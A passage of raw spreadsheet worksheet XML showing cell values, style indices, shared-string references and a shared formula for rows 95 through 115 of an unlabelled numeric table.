      </c>
      <c r="AA95" s="39" t="s">
        <v>1408</v>
      </c>
      <c r="AB95" s="38" t="s">
        <v>1409</v>
      </c>
      <c r="AC95" s="40">
        <v>197504.0</v>
      </c>
      <c r="AD95" s="5"/>
      <c r="AE95" s="14"/>
      <c r="AF95" s="14"/>
    </row>
    <row r="96">
      <c r="A96" s="6">
        <f t="shared" si="1"/>
        <v>0.818576296</v>
      </c>
      <c r="B96" s="29">
        <v>1.0</v>
      </c>
      <c r="C96" s="14"/>
      <c r="D96" s="14"/>
      <c r="E96" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F96" s="14"/>
      <c r="G96" s="29">
        <v>0.0</v>
      </c>
      <c r="H96" s="29">
        <v>152.0</v>
      </c>
      <c r="I96" s="29">
        <v>234658.0</v>
      </c>
      <c r="J96" s="15"/>
      <c r="K96" s="15"/>
      <c r="L96" s="15"/>
      <c r="M96" s="14"/>
      <c r="N96" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O96" s="29">
        <v>1.0</v>
      </c>
      <c r="P96" s="29">
        <v>1.0</v>
      </c>
      <c r="Q96" s="15"/>
      <c r="R96" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S96" s="15"/>
      <c r="T96" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U96" s="5"/>
      <c r="V96" s="5"/>
      <c r="W96" s="47"/>
      <c r="X96" s="45"/>
      <c r="Y96" s="45"/>
      <c r="Z96" s="38" t="s">
        <v>1410</v>
      </c>
      <c r="AA96" s="39" t="s">
        <v>1411</v>
      </c>
      <c r="AB96" s="38" t="s">
        <v>1412</v>
      </c>
      <c r="AC96" s="40">
        <v>231675.0</v>
      </c>
      <c r="AD96" s="5"/>
      <c r="AE96" s="14"/>
      <c r="AF96" s="14"/>
    </row>
    <row r="97">
      <c r="A97" s="6">
        <f t="shared" si="1"/>
        <v>0.4419037333</v>
      </c>
      <c r="B97" s="29">
        <v>1.0</v>
      </c>
      <c r="C97" s="29">
        <v>83699.0</v>
      </c>
      <c r="D97" s="14"/>
      <c r="E97" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F97" s="14"/>
      <c r="G97" s="29">
        <v>1.0</v>
      </c>
      <c r="H97" s="29">
        <v>370.0</v>
      </c>
      <c r="I97" s="29">
        <v>8335.0</v>
      </c>
      <c r="J97" s="15"/>
      <c r="K97" s="29">
        <v>8340.0</v>
      </c>
      <c r="L97" s="15"/>
      <c r="M97" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N97" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O97" s="29">
        <v>1.0</v>
      </c>
      <c r="P97" s="29">
        <v>1.0</v>
      </c>
      <c r="Q97" s="15"/>
      <c r="R97" s="15"/>
      <c r="S97" s="15"/>
      <c r="T97" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U97" s="5"/>
      <c r="V97" s="5"/>
      <c r="W97" s="47"/>
      <c r="X97" s="45"/>
      <c r="Y97" s="45"/>
      <c r="Z97" s="38" t="s">
        <v>1413</v>
      </c>
      <c r="AA97" s="39" t="s">
        <v>1414</v>
      </c>
      <c r="AB97" s="38" t="s">
        <v>1415</v>
      </c>
      <c r="AC97" s="40">
        <v>83688.0</v>
      </c>
      <c r="AD97" s="5"/>
      <c r="AE97" s="14"/>
      <c r="AF97" s="14"/>
    </row>
    <row r="98">
      <c r="A98" s="6">
        <f t="shared" si="1"/>
        <v>0.6092147933</v>
      </c>
      <c r="B98" s="29">
        <v>1.0</v>
      </c>
      <c r="C98" s="29">
        <v>195758.0</v>
      </c>
      <c r="D98" s="14"/>
      <c r="E98" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F98" s="14"/>
      <c r="G98" s="29">
        <v>1.0</v>
      </c>
      <c r="H98" s="29">
        <v>545.0</v>
      </c>
      <c r="I98" s="29">
        <v>106045.0</v>
      </c>
      <c r="J98" s="15"/>
      <c r="K98" s="29">
        <v>187794.0</v>
      </c>
      <c r="L98" s="15"/>
      <c r="M98" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N98" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O98" s="29">
        <v>3.0</v>
      </c>
      <c r="P98" s="29">
        <v>5.0</v>
      </c>
      <c r="Q98" s="15"/>
      <c r="R98" s="15"/>
      <c r="S98" s="15"/>
      <c r="T98" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U98" s="5"/>
      <c r="V98" s="5"/>
      <c r="W98" s="47"/>
      <c r="X98" s="45"/>
      <c r="Y98" s="45"/>
      <c r="Z98" s="38" t="s">
        <v>1416</v>
      </c>
      <c r="AA98" s="39" t="s">
        <v>1417</v>
      </c>
      <c r="AB98" s="38" t="s">
        <v>1418</v>
      </c>
      <c r="AC98" s="40">
        <v>195552.0</v>
      </c>
      <c r="AD98" s="5"/>
      <c r="AE98" s="14"/>
      <c r="AF98" s="14"/>
    </row>
    <row r="99">
      <c r="A99" s="6">
        <f t="shared" si="1"/>
        <v>0.4983866418</v>
      </c>
      <c r="B99" s="29">
        <v>1.0</v>
      </c>
      <c r="C99" s="29">
        <v>103634.0</v>
      </c>
      <c r="D99" s="14"/>
      <c r="E99" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F99" s="14"/>
      <c r="G99" s="29">
        <v>0.0</v>
      </c>
      <c r="H99" s="29">
        <v>110.0</v>
      </c>
      <c r="I99" s="29">
        <v>81374.0</v>
      </c>
      <c r="J99" s="15"/>
      <c r="K99" s="15"/>
      <c r="L99" s="15"/>
      <c r="M99" s="14"/>
      <c r="N99" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O99" s="29">
        <v>1.0</v>
      </c>
      <c r="P99" s="29">
        <v>0.0</v>
      </c>
      <c r="Q99" s="15"/>
      <c r="R99" s="15"/>
      <c r="S99" s="15"/>
      <c r="T99" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U99" s="5"/>
      <c r="V99" s="5"/>
      <c r="W99" s="47"/>
      <c r="X99" s="45"/>
      <c r="Y99" s="45"/>
      <c r="Z99" s="38" t="s">
        <v>1419</v>
      </c>
      <c r="AA99" s="39" t="s">
        <v>1420</v>
      </c>
      <c r="AB99" s="38" t="s">
        <v>1421</v>
      </c>
      <c r="AC99" s="40">
        <v>103632.0</v>
      </c>
      <c r="AD99" s="5"/>
      <c r="AE99" s="14"/>
      <c r="AF99" s="14"/>
    </row>
    <row r="100">
      <c r="A100" s="6">
        <f t="shared" si="1"/>
        <v>0.2452626982</v>
      </c>
      <c r="B100" s="29">
        <v>1.0</v>
      </c>
      <c r="C100" s="15"/>
      <c r="D100" s="14"/>
      <c r="E100" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F100" s="14"/>
      <c r="G100" s="29">
        <v>8.0</v>
      </c>
      <c r="H100" s="29">
        <v>4041.0</v>
      </c>
      <c r="I100" s="29">
        <v>46278.0</v>
      </c>
      <c r="J100" s="15"/>
      <c r="K100" s="29">
        <v>46278.0</v>
      </c>
      <c r="L100" s="14"/>
      <c r="M100" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N100" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O100" s="29">
        <v>1.0</v>
      </c>
      <c r="P100" s="29">
        <v>3.0</v>
      </c>
      <c r="Q100" s="15"/>
      <c r="R100" s="15"/>
      <c r="S100" s="15"/>
      <c r="T100" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U100" s="5"/>
      <c r="V100" s="5"/>
      <c r="W100" s="47"/>
      <c r="X100" s="45"/>
      <c r="Y100" s="45"/>
      <c r="Z100" s="38" t="s">
        <v>1422</v>
      </c>
      <c r="AA100" s="39" t="s">
        <v>1423</v>
      </c>
      <c r="AB100" s="38" t="s">
        <v>1357</v>
      </c>
      <c r="AC100" s="40">
        <v>57600.0</v>
      </c>
      <c r="AD100" s="5"/>
      <c r="AE100" s="14"/>
      <c r="AF100" s="14"/>
    </row>
    <row r="101">
      <c r="A101" s="6">
        <f t="shared" si="1"/>
        <v>0.9040930053</v>
      </c>
      <c r="B101" s="29">
        <v>1.0</v>
      </c>
      <c r="C101" s="14"/>
      <c r="D101" s="14"/>
      <c r="E101" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F101" s="14"/>
      <c r="G101" s="29">
        <v>4.0</v>
      </c>
      <c r="H101" s="29">
        <v>2997.0</v>
      </c>
      <c r="I101" s="29">
        <v>971.0</v>
      </c>
      <c r="J101" s="15"/>
      <c r="K101" s="15"/>
      <c r="L101" s="15"/>
      <c r="M101" s="14"/>
      <c r="N101" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O101" s="29">
        <v>2.0</v>
      </c>
      <c r="P101" s="29">
        <v>2.0</v>
      </c>
      <c r="Q101" s="15"/>
      <c r="R101" s="15"/>
      <c r="S101" s="15"/>
      <c r="T101" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U101" s="5"/>
      <c r="V101" s="5"/>
      <c r="W101" s="47"/>
      <c r="X101" s="45"/>
      <c r="Y101" s="45"/>
      <c r="Z101" s="38" t="s">
        <v>1424</v>
      </c>
      <c r="AA101" s="39" t="s">
        <v>1425</v>
      </c>
      <c r="AB101" s="38" t="s">
        <v>1426</v>
      </c>
      <c r="AC101" s="40">
        <v>94874.0</v>
      </c>
      <c r="AD101" s="5"/>
      <c r="AE101" s="14"/>
      <c r="AF101" s="14"/>
    </row>
    <row r="102">
      <c r="A102" s="6">
        <f t="shared" si="1"/>
        <v>0.3466230599</v>
      </c>
      <c r="B102" s="29">
        <v>1.0</v>
      </c>
      <c r="C102" s="29">
        <v>91686.0</v>
      </c>
      <c r="D102" s="14"/>
      <c r="E102" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F102" s="14"/>
      <c r="G102" s="29">
        <v>88.0</v>
      </c>
      <c r="H102" s="29">
        <v>20178.0</v>
      </c>
      <c r="I102" s="29">
        <v>31356.0</v>
      </c>
      <c r="J102" s="15"/>
      <c r="K102" s="29">
        <v>31356.0</v>
      </c>
      <c r="L102" s="15"/>
      <c r="M102" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N102" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O102" s="29">
        <v>9.0</v>
      </c>
      <c r="P102" s="29">
        <v>2.0</v>
      </c>
      <c r="Q102" s="15"/>
      <c r="R102" s="15"/>
      <c r="S102" s="15"/>
      <c r="T102" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U102" s="5"/>
      <c r="V102" s="5"/>
      <c r="W102" s="47"/>
      <c r="X102" s="45"/>
      <c r="Y102" s="45"/>
      <c r="Z102" s="38" t="s">
        <v>1427</v>
      </c>
      <c r="AA102" s="39" t="s">
        <v>1428</v>
      </c>
      <c r="AB102" s="38" t="s">
        <v>1426</v>
      </c>
      <c r="AC102" s="40">
        <v>91681.0</v>
      </c>
      <c r="AD102" s="5"/>
      <c r="AE102" s="14"/>
      <c r="AF102" s="14"/>
    </row>
    <row r="103">
      <c r="A103" s="6">
        <f t="shared" si="1"/>
        <v>0.816394661</v>
      </c>
      <c r="B103" s="29">
        <v>1.0</v>
      </c>
      <c r="C103" s="15"/>
      <c r="D103" s="14"/>
      <c r="E103" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F103" s="14"/>
      <c r="G103" s="29">
        <v>2.0</v>
      </c>
      <c r="H103" s="29">
        <v>205.0</v>
      </c>
      <c r="I103" s="29">
        <v>246362.0</v>
      </c>
      <c r="J103" s="15"/>
      <c r="K103" s="29">
        <v>6253.0</v>
      </c>
      <c r="L103" s="15"/>
      <c r="M103" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N103" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O103" s="29">
        <v>0.0</v>
      </c>
      <c r="P103" s="29">
        <v>3.0</v>
      </c>
      <c r="Q103" s="15"/>
      <c r="R103" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S103" s="15"/>
      <c r="T103" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U103" s="5"/>
      <c r="V103" s="5"/>
      <c r="W103" s="47"/>
      <c r="X103" s="45"/>
      <c r="Y103" s="45"/>
      <c r="Z103" s="38" t="s">
        <v>1429</v>
      </c>
      <c r="AA103" s="39" t="s">
        <v>1430</v>
      </c>
      <c r="AB103" s="38" t="s">
        <v>1431</v>
      </c>
      <c r="AC103" s="40">
        <v>241353.0</v>
      </c>
      <c r="AD103" s="5"/>
      <c r="AE103" s="14"/>
      <c r="AF103" s="14"/>
    </row>
    <row r="104">
      <c r="A104" s="6">
        <f t="shared" si="1"/>
        <v>0.9337266</v>
      </c>
      <c r="B104" s="29">
        <v>1.0</v>
      </c>
      <c r="C104" s="29">
        <v>36708.0</v>
      </c>
      <c r="D104" s="14"/>
      <c r="E104" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F104" s="14"/>
      <c r="G104" s="29">
        <v>14.0</v>
      </c>
      <c r="H104" s="29">
        <v>1819.0</v>
      </c>
      <c r="I104" s="29">
        <v>24342.0</v>
      </c>
      <c r="J104" s="15"/>
      <c r="K104" s="29">
        <v>24342.0</v>
      </c>
      <c r="L104" s="15"/>
      <c r="M104" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N104" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O104" s="29">
        <v>5.0</v>
      </c>
      <c r="P104" s="29">
        <v>7.0</v>
      </c>
      <c r="Q104" s="15"/>
      <c r="R104" s="15"/>
      <c r="S104" s="15"/>
      <c r="T104" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U104" s="5"/>
      <c r="V104" s="5"/>
      <c r="W104" s="47"/>
      <c r="X104" s="45"/>
      <c r="Y104" s="45"/>
      <c r="Z104" s="38" t="s">
        <v>1432</v>
      </c>
      <c r="AA104" s="39" t="s">
        <v>1433</v>
      </c>
      <c r="AB104" s="38" t="s">
        <v>1434</v>
      </c>
      <c r="AC104" s="40">
        <v>36699.0</v>
      </c>
      <c r="AD104" s="5"/>
      <c r="AE104" s="14"/>
      <c r="AF104" s="14"/>
    </row>
    <row r="105">
      <c r="A105" s="6">
        <f t="shared" si="1"/>
        <v>0.06797281271</v>
      </c>
      <c r="B105" s="29">
        <v>1.0</v>
      </c>
      <c r="C105" s="15"/>
      <c r="D105" s="14"/>
      <c r="E105" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F105" s="14"/>
      <c r="G105" s="29">
        <v>2.0</v>
      </c>
      <c r="H105" s="29">
        <v>862.0</v>
      </c>
      <c r="I105" s="29">
        <v>12244.0</v>
      </c>
      <c r="J105" s="15"/>
      <c r="K105" s="15"/>
      <c r="L105" s="15"/>
      <c r="M105" s="15"/>
      <c r="N105" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O105" s="29">
        <v>3.0</v>
      </c>
      <c r="P105" s="29">
        <v>6.0</v>
      </c>
      <c r="Q105" s="15"/>
      <c r="R105" s="15"/>
      <c r="S105" s="15"/>
      <c r="T105" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U105" s="5"/>
      <c r="V105" s="5"/>
      <c r="W105" s="47"/>
      <c r="X105" s="45"/>
      <c r="Y105" s="45"/>
      <c r="Z105" s="38" t="s">
        <v>1435</v>
      </c>
      <c r="AA105" s="39" t="s">
        <v>1436</v>
      </c>
      <c r="AB105" s="38" t="s">
        <v>1437</v>
      </c>
      <c r="AC105" s="40">
        <v>196752.0</v>
      </c>
      <c r="AD105" s="5"/>
      <c r="AE105" s="14"/>
      <c r="AF105" s="14"/>
    </row>
    <row r="106">
      <c r="A106" s="6">
        <f t="shared" si="1"/>
        <v>0.400774605</v>
      </c>
      <c r="B106" s="29">
        <v>1.0</v>
      </c>
      <c r="C106" s="15"/>
      <c r="D106" s="14"/>
      <c r="E106" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F106" s="14"/>
      <c r="G106" s="29">
        <v>0.0</v>
      </c>
      <c r="H106" s="29">
        <v>167.0</v>
      </c>
      <c r="I106" s="29">
        <v>81893.0</v>
      </c>
      <c r="J106" s="15"/>
      <c r="K106" s="29">
        <v>81893.0</v>
      </c>
      <c r="L106" s="15"/>
      <c r="M106" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N106" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O106" s="29">
        <v>0.0</v>
      </c>
      <c r="P106" s="29">
        <v>8.0</v>
      </c>
      <c r="Q106" s="15"/>
      <c r="R106" s="15"/>
      <c r="S106" s="15"/>
      <c r="T106" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U106" s="5"/>
      <c r="V106" s="5"/>
      <c r="W106" s="47"/>
      <c r="X106" s="45"/>
      <c r="Y106" s="45"/>
      <c r="Z106" s="38" t="s">
        <v>1438</v>
      </c>
      <c r="AA106" s="39" t="s">
        <v>1439</v>
      </c>
      <c r="AB106" s="38" t="s">
        <v>1440</v>
      </c>
      <c r="AC106" s="40">
        <v>231658.0</v>
      </c>
      <c r="AD106" s="5"/>
      <c r="AE106" s="14"/>
      <c r="AF106" s="14"/>
    </row>
    <row r="107">
      <c r="A107" s="6">
        <f t="shared" si="1"/>
        <v>0.3178191528</v>
      </c>
      <c r="B107" s="29">
        <v>1.0</v>
      </c>
      <c r="C107" s="15"/>
      <c r="D107" s="14"/>
      <c r="E107" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F107" s="14"/>
      <c r="G107" s="29">
        <v>0.0</v>
      </c>
      <c r="H107" s="29">
        <v>186.0</v>
      </c>
      <c r="I107" s="29">
        <v>63694.0</v>
      </c>
      <c r="J107" s="15"/>
      <c r="K107" s="29">
        <v>63694.0</v>
      </c>
      <c r="L107" s="15"/>
      <c r="M107" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N107" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O107" s="29">
        <v>1.0</v>
      </c>
      <c r="P107" s="29">
        <v>2.0</v>
      </c>
      <c r="Q107" s="29">
        <v>0.0</v>
      </c>
      <c r="R107" s="15"/>
      <c r="S107" s="15"/>
      <c r="T107" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U107" s="5"/>
      <c r="V107" s="5"/>
      <c r="W107" s="47"/>
      <c r="X107" s="45"/>
      <c r="Y107" s="45"/>
      <c r="Z107" s="38" t="s">
        <v>1441</v>
      </c>
      <c r="AA107" s="39" t="s">
        <v>1442</v>
      </c>
      <c r="AB107" s="38" t="s">
        <v>1443</v>
      </c>
      <c r="AC107" s="40">
        <v>221283.0</v>
      </c>
      <c r="AD107" s="5"/>
      <c r="AE107" s="14"/>
      <c r="AF107" s="14"/>
    </row>
    <row r="108">
      <c r="A108" s="6">
        <f t="shared" si="1"/>
        <v>0.126862071</v>
      </c>
      <c r="B108" s="29">
        <v>1.0</v>
      </c>
      <c r="C108" s="14"/>
      <c r="D108" s="14"/>
      <c r="E108" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F108" s="14"/>
      <c r="G108" s="29">
        <v>0.0</v>
      </c>
      <c r="H108" s="29">
        <v>194.0</v>
      </c>
      <c r="I108" s="29">
        <v>35587.0</v>
      </c>
      <c r="J108" s="15"/>
      <c r="K108" s="29">
        <v>35587.0</v>
      </c>
      <c r="L108" s="15"/>
      <c r="M108" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N108" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O108" s="29">
        <v>1.0</v>
      </c>
      <c r="P108" s="29">
        <v>7.0</v>
      </c>
      <c r="Q108" s="15"/>
      <c r="R108" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S108" s="15"/>
      <c r="T108" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U108" s="5"/>
      <c r="V108" s="5"/>
      <c r="W108" s="47"/>
      <c r="X108" s="45"/>
      <c r="Y108" s="45"/>
      <c r="Z108" s="38" t="s">
        <v>1444</v>
      </c>
      <c r="AA108" s="39" t="s">
        <v>1445</v>
      </c>
      <c r="AB108" s="38" t="s">
        <v>1446</v>
      </c>
      <c r="AC108" s="40">
        <v>46894.0</v>
      </c>
      <c r="AD108" s="5"/>
      <c r="AE108" s="14"/>
      <c r="AF108" s="14"/>
    </row>
    <row r="109">
      <c r="A109" s="6">
        <f t="shared" si="1"/>
        <v>0.9974112166</v>
      </c>
      <c r="B109" s="29">
        <v>1.0</v>
      </c>
      <c r="C109" s="15"/>
      <c r="D109" s="14"/>
      <c r="E109" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F109" s="14"/>
      <c r="G109" s="29">
        <v>1.0</v>
      </c>
      <c r="H109" s="29">
        <v>115.0</v>
      </c>
      <c r="I109" s="29">
        <v>89900.0</v>
      </c>
      <c r="J109" s="15"/>
      <c r="K109" s="15"/>
      <c r="L109" s="15"/>
      <c r="M109" s="15"/>
      <c r="N109" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O109" s="29">
        <v>2.0</v>
      </c>
      <c r="P109" s="29">
        <v>0.0</v>
      </c>
      <c r="Q109" s="15"/>
      <c r="R109" s="15"/>
      <c r="S109" s="15"/>
      <c r="T109" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U109" s="5"/>
      <c r="V109" s="5"/>
      <c r="W109" s="47"/>
      <c r="X109" s="45"/>
      <c r="Y109" s="45"/>
      <c r="Z109" s="38" t="s">
        <v>1447</v>
      </c>
      <c r="AA109" s="39" t="s">
        <v>1448</v>
      </c>
      <c r="AB109" s="38" t="s">
        <v>1170</v>
      </c>
      <c r="AC109" s="40">
        <v>123068.0</v>
      </c>
      <c r="AD109" s="5"/>
      <c r="AE109" s="14"/>
      <c r="AF109" s="14"/>
    </row>
    <row r="110">
      <c r="A110" s="6">
        <f t="shared" si="1"/>
        <v>0.8205608607</v>
      </c>
      <c r="B110" s="29">
        <v>1.0</v>
      </c>
      <c r="C110" s="15"/>
      <c r="D110" s="14"/>
      <c r="E110" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F110" s="14"/>
      <c r="G110" s="29">
        <v>1.0</v>
      </c>
      <c r="H110" s="29">
        <v>337.0</v>
      </c>
      <c r="I110" s="29">
        <v>15154.0</v>
      </c>
      <c r="J110" s="15"/>
      <c r="K110" s="29">
        <v>63368.0</v>
      </c>
      <c r="L110" s="14"/>
      <c r="M110" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N110" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O110" s="29">
        <v>0.0</v>
      </c>
      <c r="P110" s="29">
        <v>3.0</v>
      </c>
      <c r="Q110" s="15"/>
      <c r="R110" s="15"/>
      <c r="S110" s="15"/>
      <c r="T110" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U110" s="5"/>
      <c r="V110" s="5"/>
      <c r="W110" s="47"/>
      <c r="X110" s="45"/>
      <c r="Y110" s="45"/>
      <c r="Z110" s="38" t="s">
        <v>1449</v>
      </c>
      <c r="AA110" s="39" t="s">
        <v>1450</v>
      </c>
      <c r="AB110" s="38" t="s">
        <v>1451</v>
      </c>
      <c r="AC110" s="40">
        <v>77439.0</v>
      </c>
      <c r="AD110" s="5"/>
      <c r="AE110" s="14"/>
      <c r="AF110" s="14"/>
    </row>
    <row r="111">
      <c r="A111" s="6">
        <f t="shared" si="1"/>
        <v>0.2711252192</v>
      </c>
      <c r="B111" s="29">
        <v>1.0</v>
      </c>
      <c r="C111" s="29">
        <v>170328.0</v>
      </c>
      <c r="D111" s="14"/>
      <c r="E111" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F111" s="14"/>
      <c r="G111" s="29">
        <v>14.0</v>
      </c>
      <c r="H111" s="29">
        <v>670.0</v>
      </c>
      <c r="I111" s="29">
        <v>159849.0</v>
      </c>
      <c r="J111" s="15"/>
      <c r="K111" s="29">
        <v>159849.0</v>
      </c>
      <c r="L111" s="15"/>
      <c r="M111" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N111" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O111" s="29">
        <v>2.0</v>
      </c>
      <c r="P111" s="29">
        <v>5.0</v>
      </c>
      <c r="Q111" s="15"/>
      <c r="R111" s="15"/>
      <c r="S111" s="15"/>
      <c r="T111" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U111" s="5"/>
      <c r="V111" s="5"/>
      <c r="W111" s="47"/>
      <c r="X111" s="45"/>
      <c r="Y111" s="45"/>
      <c r="Z111" s="38" t="s">
        <v>1452</v>
      </c>
      <c r="AA111" s="39" t="s">
        <v>1453</v>
      </c>
      <c r="AB111" s="38" t="s">
        <v>1454</v>
      </c>
      <c r="AC111" s="40">
        <v>170144.0</v>
      </c>
      <c r="AD111" s="5"/>
      <c r="AE111" s="14"/>
      <c r="AF111" s="14"/>
    </row>
    <row r="112">
      <c r="A112" s="6">
        <f t="shared" si="1"/>
        <v>0.9009737795</v>
      </c>
      <c r="B112" s="29">
        <v>1.0</v>
      </c>
      <c r="C112" s="29">
        <v>61332.0</v>
      </c>
      <c r="D112" s="14"/>
      <c r="E112" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F112" s="14"/>
      <c r="G112" s="29">
        <v>9.0</v>
      </c>
      <c r="H112" s="29">
        <v>555.0</v>
      </c>
      <c r="I112" s="29">
        <v>49529.0</v>
      </c>
      <c r="J112" s="15"/>
      <c r="K112" s="29">
        <v>49529.0</v>
      </c>
      <c r="L112" s="15"/>
      <c r="M112" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N112" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O112" s="29">
        <v>2.0</v>
      </c>
      <c r="P112" s="29">
        <v>6.0</v>
      </c>
      <c r="Q112" s="15"/>
      <c r="R112" s="15"/>
      <c r="S112" s="15"/>
      <c r="T112" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U112" s="5"/>
      <c r="V112" s="5"/>
      <c r="W112" s="47"/>
      <c r="X112" s="45"/>
      <c r="Y112" s="45"/>
      <c r="Z112" s="38" t="s">
        <v>1455</v>
      </c>
      <c r="AA112" s="39" t="s">
        <v>1456</v>
      </c>
      <c r="AB112" s="38" t="s">
        <v>1457</v>
      </c>
      <c r="AC112" s="40">
        <v>61325.0</v>
      </c>
      <c r="AD112" s="5"/>
      <c r="AE112" s="14"/>
      <c r="AF112" s="14"/>
    </row>
    <row r="113">
      <c r="A113" s="6">
        <f t="shared" si="1"/>
        <v>0.03567827436</v>
      </c>
      <c r="B113" s="29">
        <v>1.0</v>
      </c>
      <c r="C113" s="14"/>
      <c r="D113" s="14"/>
      <c r="E113" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F113" s="14"/>
      <c r="G113" s="29">
        <v>2.0</v>
      </c>
      <c r="H113" s="29">
        <v>1674.0</v>
      </c>
      <c r="I113" s="29">
        <v>32378.0</v>
      </c>
      <c r="J113" s="15"/>
      <c r="K113" s="29">
        <v>32378.0</v>
      </c>
      <c r="L113" s="15"/>
      <c r="M113" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N113" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O113" s="29">
        <v>2.0</v>
      </c>
      <c r="P113" s="29">
        <v>3.0</v>
      </c>
      <c r="Q113" s="15"/>
      <c r="R113" s="15"/>
      <c r="S113" s="15"/>
      <c r="T113" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U113" s="5"/>
      <c r="V113" s="5"/>
      <c r="W113" s="47"/>
      <c r="X113" s="45"/>
      <c r="Y113" s="45"/>
      <c r="Z113" s="38" t="s">
        <v>1458</v>
      </c>
      <c r="AA113" s="39" t="s">
        <v>1459</v>
      </c>
      <c r="AB113" s="38" t="s">
        <v>1460</v>
      </c>
      <c r="AC113" s="40">
        <v>159506.0</v>
      </c>
      <c r="AD113" s="5"/>
      <c r="AE113" s="14"/>
      <c r="AF113" s="14"/>
    </row>
    <row r="114">
      <c r="A114" s="6">
        <f t="shared" si="1"/>
        <v>0.4858222893</v>
      </c>
      <c r="B114" s="29">
        <v>1.0</v>
      </c>
      <c r="C114" s="15"/>
      <c r="D114" s="14"/>
      <c r="E114" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F114" s="14"/>
      <c r="G114" s="29">
        <v>3.0</v>
      </c>
      <c r="H114" s="29">
        <v>348.0</v>
      </c>
      <c r="I114" s="29">
        <v>272782.0</v>
      </c>
      <c r="J114" s="15"/>
      <c r="K114" s="15"/>
      <c r="L114" s="15"/>
      <c r="M114" s="15"/>
      <c r="N114" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O114" s="29">
        <v>0.0</v>
      </c>
      <c r="P114" s="29">
        <v>11.0</v>
      </c>
      <c r="Q114" s="15"/>
      <c r="R114" s="15"/>
      <c r="S114" s="15"/>
      <c r="T114" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U114" s="5"/>
      <c r="V114" s="5"/>
      <c r="W114" s="47"/>
      <c r="X114" s="45"/>
      <c r="Y114" s="45"/>
      <c r="Z114" s="38" t="s">
        <v>1461</v>
      </c>
      <c r="AA114" s="39" t="s">
        <v>1462</v>
      </c>
      <c r="AB114" s="38" t="s">
        <v>1463</v>
      </c>
      <c r="AC114" s="40">
        <v>258772.0</v>
      </c>
      <c r="AD114" s="5"/>
      <c r="AE114" s="14"/>
      <c r="AF114" s="14"/>
    </row>
    <row r="115">
      <c r="A115" s="6">
        <f t="shared" si="1"/>
        <v>0.007931879927</v>
      </c>
      <c r="B115" s="29">
        <v>1.0</v>
      </c>
      <c r="C115" s="29">
        <v>245439.0</v>
      </c>
      <c r="D115" s="14"/>
      <c r="E115" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F115" s="14"/>
      <c r="G115" s="29">
        <v>60.0</v>
      </c>
      <c r="H115" s="29">
        <v>9095.0</v>
      </c>
      <c r="I115" s="29">
        <v>251896.0</v>
      </c>
      <c r="J115" s="15"/>
      <c r="K115" s="29">
        <v>21196.0</v>
      </c>
      <c r="L115" s="15"/>
      <c r="M115" s="36" t="s">
